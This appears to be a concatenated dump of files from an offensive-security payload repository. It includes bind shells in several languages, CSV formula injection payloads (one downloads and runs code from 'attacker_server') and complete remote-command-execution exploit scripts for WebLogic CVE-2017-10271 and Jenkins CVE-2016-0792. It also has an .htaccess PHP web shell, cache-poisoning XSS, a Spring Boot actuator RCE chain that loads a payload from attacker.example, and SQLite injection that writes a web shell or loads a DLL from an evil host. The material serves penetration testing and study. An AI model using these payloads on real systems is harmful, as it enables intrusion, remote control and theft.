29 | python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
30 | ```
31 | 
32 | Expanded version :
33 | 
34 | ```python
35 | import socket as s,subprocess as sp;
36 | 
37 | s1 = s.socket(s.AF_INET, s.SOCK_STREAM);
38 | s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1);
39 | s1.bind(("0.0.0.0", 51337));
40 | s1.listen(1);
41 | c, a = s1.accept();
42 | 
43 | while True: 
44 |     d = c.recv(1024).decode();
45 |     p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE);
46 |     c.sendall(p.stdout.read()+p.stderr.read())
47 | ```
48 | 
49 | ## PHP
50 | 
51 | ```php
52 | php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
53 | socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
54 | $in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
55 |     socket_write($cl,$m,strlen($m));}}'
56 | ```
57 | 
58 | ## Ruby
59 | 
60 | ```ruby
61 | ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
62 | ```
63 | 
64 | ## Netcat Traditional
65 | 
66 | ```powershell
67 | nc -nlvp 51337 -e /bin/bash
68 | ```
69 | 
70 | ## Netcat OpenBsd
71 | 
72 | ```powershell
73 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
74 | ```
75 | 
76 | ## Socat
77 | 
78 | ```powershell
79 | user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 
80 | user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
81 | ```
82 | 
83 | ## Powershell
84 | 
85 | ```powershell
86 | https://github.com/besimorhino/powercat
87 | 
88 | # Victim (listen)
89 | . .\powercat.ps1
90 | powercat -l -p 7002 -ep
91 | 
92 | # Connect from attacker
93 | . .\powercat.ps1
94 | powercat -c 127.0.0.1 -p 7002
95 | ```
96 | 


--------------------------------------------------------------------------------
/CSV Injection/README.md:
--------------------------------------------------------------------------------
 1 | # CSV Injection (Formula Injection)
 2 | 
 3 | Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
 4 | 
 5 | ## Exploit
 6 | 
 7 | Basic exploit with Dynamic Data Exchange
 8 | 
 9 | ```powershell
10 | # pop a calc
11 | DDE ("cmd";"/C calc";"!A0")A0
12 | @SUM(1+1)*cmd|' /C calc'!A0
13 | =2+5+cmd|' /C calc'!A0
14 | 
15 | # pop a notepad
16 | =cmd|' /C notepad'!'A1'
17 | 
18 | # powershell download and execute
19 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
20 | 
21 | # msf smb delivery with rundll32
22 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
23 | 
24 | # Prefix obfuscation and command chaining
25 | =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
26 | =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
27 | +thespanishinquisition(cmd|'/c calc.exe'!A
28 | =         cmd|'/c calc.exe'!A
29 | 
30 | # Using rundll32 instead of cmd
31 | =rundll32|'URL.dll,OpenURL calc.exe'!A
32 | =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
33 | 
34 | # Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
35 | =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A
36 | 
37 | ```
38 | 
39 | Technical Details of the above payload:
40 | 
41 | - `cmd` is the name the server can respond to whenever a client is trying to access the server
42 | - `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
43 | - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
44 | 
45 | Any formula can be started with
46 | 
47 | ```powershell
48 | =
49 | +
50 | –
51 | @
52 | ```
53 | 
54 | ## References
55 | 
56 | * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
57 | * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
58 | * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
59 | * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
60 | * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
61 | * [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
62 | * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
63 | * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
64 | 


--------------------------------------------------------------------------------
/CVE Exploits/WebLogic CVE-2017-10271.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from builtins import input
 3 | import requests
 4 | import sys
 5 | 
 6 | url_in = sys.argv[1]
 7 | payload_url = url_in + "/wls-wsat/CoordinatorPortType"
 8 | payload_header = {'content-type': 'text/xml'}
 9 | 
10 | 
11 | def payload_command (command_in):
12 |     html_escape_table = {
13 |         "&": "&amp;",
14 |         '"': "&quot;",
15 |         "'": "&apos;",
16 |         ">": "&gt;",
17 |         "<": "&lt;",
18 |     }
19 |     command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
20 |     payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
21 |                 "   <soapenv:Header> " \
22 |                 "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
23 |                 "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
24 |                 "               <void class=\"java.lang.ProcessBuilder\"> \n" \
25 |                 "                  <array class=\"java.lang.String\" length=\"3\">" \
26 |                 "                      <void index = \"0\">                       " \
27 |                 "                          <string>cmd</string>                 " \
28 |                 "                      </void>                                    " \
29 |                 "                      <void index = \"1\">                       " \
30 |                 "                          <string>/c</string>                  " \
31 |                 "                      </void>                                    " \
32 |                 "                      <void index = \"2\">                       " \
33 |                 + command_filtered + \
34 |                 "                      </void>                                    " \
35 |                 "                  </array>" \
36 |                 "                  <void method=\"start\"/>" \
37 |                 "                  </void>" \
38 |                 "            </java>" \
39 |                 "        </work:WorkContext>" \
40 |                 "   </soapenv:Header>" \
41 |                 "   <soapenv:Body/>" \
42 |                 "</soapenv:Envelope>"
43 |     return payload_1
44 | 
45 | def do_post(command_in):
46 |     result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
47 | 
48 |     if result.status_code == 500:
49 |         print("Command Executed \n")
50 |     else:
51 |         print("Something Went Wrong \n")
52 | 
53 | 
54 | 
55 | print("***************************************************** \n" \
56 |        "****************   Coded By 1337g  ****************** \n" \
57 |        "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
58 |        "***************************************************** \n")
59 | 
60 | while 1:
61 |     command_in = input("Eneter your command here: ")
62 |     if command_in == "exit" : exit(0)
63 |     do_post(command_in)
64 | 


--------------------------------------------------------------------------------
/Insecure Direct Object References/README.md:
--------------------------------------------------------------------------------
 1 | # Insecure Direct Object References
 2 | 
 3 | > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.  - OWASP
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Exploit](#exploit)
 9 | * [Examples](#examples)
10 | * [References](#references)
11 | 
12 | ## Tools
13 | 
14 | - Burp Suite plugin Authz
15 | - Burp Suite plugin AuthMatrix
16 | - Burp Suite plugin Authorize
17 | 
18 | ## Exploit
19 | 
20 | ![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png)
21 | 
22 | The value of a parameter is used directly to retrieve a database record.
23 | 
24 | ```powershell
25 | http://foo.bar/somepage?invoice=12345
26 | ```
27 | 
28 | The value of a parameter is used directly to perform an operation in the system
29 | 
30 | ```powershell
31 | http://foo.bar/changepassword?user=someuser
32 | ```
33 | 
34 | The value of a parameter is used directly to retrieve a file system resource
35 | 
36 | ```powershell
37 | http://foo.bar/showImage?img=img00011
38 | ```
39 | 
40 | The value of a parameter is used directly to access application functionality
41 | 
42 | ```powershell
43 | http://foo.bar/accessPage?menuitem=12
44 | ```
45 | 
46 | ## Examples
47 | 
48 | * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
49 | * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
50 | 
51 | ## References
52 | 
53 | * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
54 | * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
55 | * [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
56 | * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec
57 | * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
58 | * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 
59 | * [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)


--------------------------------------------------------------------------------
/CVE Exploits/Jenkins CVE-2016-0792.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python2
 2 | 
 3 | #Jenkins Groovy XML RCE (CVE-2016-0792)
 4 | #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
 5 | #Made with <3 by @byt3bl33d3r
 6 | 
 7 | from __future__ import print_function
 8 | import requests
 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
11 | 
12 | import argparse
13 | import sys
14 | 
15 | parser = argparse.ArgumentParser()
16 | parser.add_argument('target', type=str, help='Target IP:PORT')
17 | parser.add_argument('command', type=str, help='Command to run on target')
18 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
19 | 
20 | if len(sys.argv) < 2:
21 |     parser.print_help()
22 |     sys.exit(1)
23 | 
24 | args = parser.parse_args()
25 | 
26 | if len(args.target.split(':')) != 2:
27 |     print('[-] Target must be in format IP:PORT')
28 |     sys.exit(1)
29 | 
30 | if not args.command:
31 |     print('[-] You must specify a command to run')
32 |     sys.exit(1)
33 | 
34 | ip, port = args.target.split(':')
35 | 
36 | print('[*] Target IP: {}'.format(ip))
37 | print('[*] Target PORT: {}'.format(port))
38 | 
39 | xml_formatted = ''
40 | command_list = args.command.split()
41 | for cmd in command_list:
42 |     xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
43 | 
44 | xml_payload = '''<map>
45 |   <entry>
46 |     <groovy.util.Expando>
47 |       <expandoProperties>
48 |         <entry>
49 |           <string>hashCode</string>
50 |           <org.codehaus.groovy.runtime.MethodClosure>
51 |             <delegate class="groovy.util.Expando" reference="../../../.."/>
52 |             <owner class="java.lang.ProcessBuilder">
53 |               <command>
54 |                 {}
55 |               </command>
56 |               <redirectErrorStream>false</redirectErrorStream>
57 |             </owner>
58 |             <resolveStrategy>0</resolveStrategy>
59 |             <directive>0</directive>
60 |             <parameterTypes/>
61 |             <maximumNumberOfParameters>0</maximumNumberOfParameters>
62 |             <method>start</method>
63 |           </org.codehaus.groovy.runtime.MethodClosure>
64 |         </entry>
65 |       </expandoProperties>
66 |     </groovy.util.Expando>
67 |    <int>1</int>
68 |  </entry>
69 | </map>'''.format(xml_formatted.strip())
70 | 
71 | print('[*] Generated XML payload:')
72 | print(xml_payload)
73 | print() 
74 | 
75 | print('[*] Sending payload')
76 | headers = {'Content-Type': 'text/xml'}
77 | r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
78 | 
79 | paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
80 | if r.status_code == 500:
81 |     for path in paths_in_trace:
82 |         if path in r.text:
83 |             print('[+] Command executed successfully')
84 |             break
85 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Apache .htaccess/README.md:
--------------------------------------------------------------------------------
 1 | # .htaccess upload
 2 | 
 3 | Uploading an .htaccess file to override Apache rule and execute PHP.
 4 | "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
 5 | 
 6 | Self contained .htaccess web shell
 7 | 
 8 | ```python
 9 | # Self contained .htaccess web shell - Part of the htshell project
10 | # Written by Wireghoul - http://www.justanotherhacker.com
11 | 
12 | # Override default deny rule to make .htaccess file accessible over web
13 | <Files ~ "^\.ht">
14 | Order allow,deny
15 | Allow from all
16 | </Files>
17 | 
18 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
19 | # the apache directoves from the .htaccess file
20 | AddType application/x-httpd-php .htaccess
21 | ```
22 | 
23 | ```php
24 | ###### SHELL ######
25 | <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
26 | ```
27 | 
28 | # .htaccess upload as image
29 | 
30 | If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. 
31 | 
32 | [Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot.
33 | 
34 | ```python
35 | # create valid .htaccess/xbm image
36 | 
37 | width = 50
38 | height = 50
39 | payload = '# .htaccess file'
40 | 
41 | with open('.htaccess', 'w') as htaccess:
42 |     htaccess.write('#define test_width %d\n' % (width, ))
43 |     htaccess.write('#define test_height %d\n' % (height, ))
44 |     htaccess.write(payload)
45 | ```
46 | or
47 | ```python
48 | # create valid .htaccess/wbmp image
49 | 
50 | type_header = b'\x00'
51 | fixed_header = b'\x00'
52 | width = b'50'
53 | height = b'50'
54 | payload = b'# .htaccess file'
55 | 
56 | with open('.htaccess', 'wb') as htaccess:
57 |     htaccess.write(type_header + fixed_header + width + height)
58 |     htaccess.write(b'\n')
59 |     htaccess.write(payload)
60 | ```
61 | 
62 | ## Thanks to
63 | 
64 | * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
65 | * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
66 | * [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)
67 | 


--------------------------------------------------------------------------------
/TWITTER.md:
--------------------------------------------------------------------------------
 1 | # Twitter 
 2 | 
 3 | Twitter is very common in the InfoSec area. Many advices and tips on bug hunting or CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers. 
 4 | 
 5 | 
 6 | ### Accounts
 7 | 
 8 | - [@Stök - Bug bounty hunter, cybersecurity educational content creator](https://twitter.com/stokfredrik)
 9 | - [@NahamSec - Hacker & content creator & co-founder bugbountyforum and http://recon.dev](https://twitter.com/NahamSec)
10 | - [@dawgyg - Bug bounty hunter, reformed blackhat, Synack red team member](https://twitter.com/thedawgyg)
11 | - [@putsi - Bug bounty hunter and white hat hacker in Team ROT](https://twitter.com/putsi)
12 | - [@thecybermentor - Offers cybersecurity and hacking courses](https://twitter.com/thecybermentor)
13 | - [@InsiderPhD - PhD student, occasional bug bounty hunter & educational cyber security youtuber](https://twitter.com/InsiderPhD)
14 | - [@LiveOverflow - Content creator and hacker producing videos on various IT security topics and participating in hacking contests](https://twitter.com/LiveOverflow)
15 | - [@EdOverflow - Web developer, security researcher and triager for numerous vulnerability disclosure programs](https://twitter.com/edoverflow)
16 | - [@r0bre - Bug Hunter for web- and systemsecurity, iOS Security researcher](https://twitter.com/r0bre)
17 | - [@intigriti - European ethical hacking & bug bounty platform](https://twitter.com/intigriti)
18 | - [@Hacker0x01 - American bug bounty platform](https://twitter.com/Hacker0x01)
19 | - [@bugcrowd - Another american bug bounty platform](https://twitter.com/Bugcrowd)
20 | - [@hakluke - Bug bounty hunter, content creator, creator of some great pentesting tools like hakrawler](https://twitter.com/hakluke)
21 | - [@spaceraccoon - Security researcher and white hat hacker. Has worked on several bug bounty programs](https://twitter.com/spaceraccoonsec)
22 | - [@samwcyo - Full time bug bounty hunter](https://twitter.com/samwcyo)
23 | - [@Th3G3nt3lman - Security Reasearch & Bug bounty hunter](https://twitter.com/Th3G3nt3lman)
24 | - [@securinti - Dutch bug bounty hunter & head of hackers and bord member @ intigriti](https://twitter.com/securinti)
25 | - [@jobertabma - Co-founder of HackerOne, security researcher](https://twitter.com/jobertabma)
26 | - [@codingo_ - Global Head of Security Ops and Researcher Enablement bugcrowd, Maintainer of some great pentesting tools like NoSQLMap or VHostScan](https://twitter.com/codingo_)
27 | - [@TomNomNom - security researcher, maintainer of many very useful pentesting tools](https://twitter.com/TomNomNom)
28 | - [@orange_8361 - bug bounty hunter and security researcher, specialized on RCE bugs](https://twitter.com/orange_8361)
29 | - [@d0nutptr - part-time bug hunter, Lead Security Engineer at graplsec](https://twitter.com/d0nutptr)
30 | - [@filedescriptor - security researcher, bug hunter and content creator at 0xReconless](https://twitter.com/filedescriptor)
31 | - [@0xReconless - Security research, blogs, and videos by filedescriptor, ngalongc & EdOverflow](https://twitter.com/0xReconless)
32 | - [@pentest_swissky - Author of PayloadsAllTheThings & SSRFmap](https://twitter.com/pentest_swissky)
33 | - [@GentilKiwi - Author of Mimikatz & Kekeo](https://twitter.com/gentilkiwi)
34 | 


--------------------------------------------------------------------------------
/Web Cache Deception/README.md:
--------------------------------------------------------------------------------
 1 | # Web Cache Deception Attack
 2 | 
 3 | ## Tools
 4 | 
 5 | * [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner)
 6 |     > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
 7 | 
 8 | ## Exploit
 9 | 
10 | 1. Browser requests `http://www.example.com/home.php/non-existent.css`.
11 | 2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct to not cache this page.
12 | 3. The response goes through the proxy.
13 | 4. The proxy identifies that the file has a css extension.
14 | 5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.
15 | 
16 | ## Methodology of the attack - example
17 | 
18 | 1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
19 | 2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css`
20 | 3. The page is displayed as /home and the cache is saving the page
21 | 4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css`
22 | 5. The content of the cache is displayed
23 | 
24 | Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
25 | [![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093)
26 | 
27 | ## Methodology 2
28 | 
29 | 1. Find an unkeyed input for a Cache Poisoning
30 |     ```js
31 |     Values: User-Agent
32 |     Values: Cookie
33 |     Header: X-Forwarded-Host
34 |     Header: X-Host
35 |     Header: X-Forwarded-Server
36 |     Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host)
37 |     Header: X-Original-URL (Symfony)
38 |     Header: X-Rewrite-URL (Symfony)
39 |     ```
40 | 2. Cache poisoning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
41 |     ```js
42 |     GET /test?buster=123 HTTP/1.1
43 |     Host: target.com
44 |     X-Forwarded-Host: test"><script>alert(1)</script>
45 | 
46 |     HTTP/1.1 200 OK
47 |     Cache-Control: public, no-cache
48 |     [..]
49 |     <meta property="og:image" content="https://test"><script>alert(1)</script>">
50 |     ```
51 | 
52 | 
53 | ## References
54 | 
55 | * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
56 | * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
57 | * [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement)
58 | * [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
59 | * [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning)
60 |   - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
61 |   - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
62 | 


--------------------------------------------------------------------------------
/Insecure Management Interface/README.md:
--------------------------------------------------------------------------------
 1 | # Insecure management interface
 2 | 
 3 | ## Springboot-Actuator
 4 | 
 5 | Actuator endpoints let you monitor and interact with your application. 
 6 | Spring Boot includes a number of built-in endpoints and lets you add your own. 
 7 | For example, the `/health` endpoint provides basic application health information. 
 8 | 
 9 | Some of them contains sensitive info such as :
10 | 
11 | - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
12 | - `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment).
13 | - `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
14 | - `/dump` - Displays a dump of threads (including a stack trace).
15 | - `/logfile` - Outputs the contents of the log file.
16 | - `/mappings` - Shows all of the MVC controller mappings.
17 | 
18 | These endpoints are enabled by default in Springboot 1.X.
19 | Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.
20 | 
21 | Since Springboot 2.X only `/health` and `/info` are enabled by default.
22 | 
23 | ### Remote Code Execution via `/env`
24 | 
25 | Spring is able to load external configurations in the YAML format.
26 | The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
27 | In other words, an attacker can gain remote code execution by loading a malicious config file.
28 | 
29 | #### Steps
30 | 
31 | 1. Generate a payload of SnakeYAML deserialization gadget.
32 | 
33 | - Build malicious jar
34 | ```bash
35 | git clone https://github.com/artsploit/yaml-payload.git
36 | cd yaml-payload
37 | # Edit the payload before executing the last commands (see below)
38 | javac src/artsploit/AwesomeScriptEngineFactory.java
39 | jar -cvf yaml-payload.jar -C src/ .
40 | ```
41 | 
42 | - Edit src/artsploit/AwesomeScriptEngineFactory.java
43 | 
44 | ```java
45 | public AwesomeScriptEngineFactory() {
46 |     try {
47 |         Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
48 |     } catch (IOException e) {
49 |         e.printStackTrace();
50 |     }
51 | }
52 | ```
53 | 
54 | - Create a malicious yaml config (yaml-payload.yml)
55 | 
56 | ```yaml
57 | !!javax.script.ScriptEngineManager [
58 |   !!java.net.URLClassLoader [[
59 |     !!java.net.URL ["http://attacker.example/yaml-payload.jar"]
60 |   ]]
61 | ]
62 | ```
63 | 
64 | 
65 | 2. Host the malicious files on your server.
66 | 
67 | - yaml-payload.jar
68 | - yaml-payload.yml
69 | 
70 | 
71 | 3. Change `spring.cloud.bootstrap.location` to your server.
72 | 
73 | ```
74 | POST /env HTTP/1.1
75 | Host: victim.example:8090
76 | Content-Type: application/x-www-form-urlencoded
77 | Content-Length: 59
78 |  
79 | spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
80 | ```
81 | 
82 | 4. Reload the configuration.
83 | 
84 | ```
85 | POST /refresh HTTP/1.1
86 | Host: victim.example:8090
87 | Content-Type: application/x-www-form-urlencoded
88 | Content-Length: 0
89 | ```
90 | 
91 | ## References
92 | 
93 | * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
94 | * [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
95 | 


--------------------------------------------------------------------------------
/SQL Injection/SQLite Injection.md:
--------------------------------------------------------------------------------
 1 | # SQLite Injection
 2 | 
 3 | ## Summary
 4 | 
 5 | * [SQLite comments](#sqlite-comments)
 6 | * [SQLite version](#sqlite-version)
 7 | * [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
 8 | * [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
 9 | * [Boolean - Count number of tables](#boolean---count-number-of-tables)
10 | * [Boolean - Enumerating table name](#boolean---enumerating-table-name)
11 | * [Boolean - Extract info](#boolean---extract-info)
12 | * [Time based](#time-based)
13 | * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
14 | * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
15 | * [References](#references)
16 | ## SQLite comments
17 | 
18 | ```sql
19 | --
20 | /**/
21 | ```
22 | 
23 | ## SQLite version
24 | 
25 | ```sql
26 | select sqlite_version();
27 | ```
28 | 
29 | ## Integer/String based - Extract table name
30 | 
31 | ```sql
32 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
33 | ```
34 | 
35 | Use limit X+1 offset X, to extract all tables.
36 | 
37 | ## Integer/String based - Extract column name
38 | 
39 | ```sql
40 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
41 | ```
42 | 
43 | For a clean output
44 | 
45 | ```sql
46 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
47 | ```
48 | 
49 | ## Boolean - Count number of tables
50 | 
51 | ```sql
52 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
53 | ```
54 | 
55 | ## Boolean - Enumerating table name
56 | 
57 | ```sql
58 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
59 | ```
60 | 
61 | ## Boolean - Extract info
62 | 
63 | ```sql
64 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
65 | ```
66 | 
67 | ## Time based
68 | 
69 | ```sql
70 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
71 | ```
72 | 
73 | ## Remote Command Execution using SQLite command - Attach Database
74 | 
75 | ```sql
76 | ATTACH DATABASE '/var/www/lol.php' AS lol;
77 | CREATE TABLE lol.pwn (dataz text);
78 | INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
79 | ```
80 | 
81 | ## Remote Command Execution using SQLite command - Load_extension
82 | 
83 | ```sql
84 | UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
85 | ```
86 | 
87 | Note: By default this component is disabled
88 | 
89 | ## References
90 | 
91 | [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
92 | 


--------------------------------------------------------------------------------
